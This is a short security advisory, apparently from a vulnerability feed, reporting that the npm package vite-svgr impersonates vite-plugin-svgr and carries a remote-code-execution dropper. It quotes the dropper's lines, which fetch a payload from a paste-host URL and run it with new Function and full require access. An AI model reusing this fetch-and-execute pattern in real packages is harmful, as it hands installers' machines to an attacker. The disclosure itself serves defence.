Malicious code in vite-svgr (npm)

__

Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)

Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } }) and then runs the response body's Cookie field via new Function('require', s)(require) — arbitrary JavaScript with full Node require access executed under the installer's user. The code is reachable from the package's main via the exported configJson(...), which spawns node lib/mapProps.js detached, so any consumer that imports this package and calls configJson triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.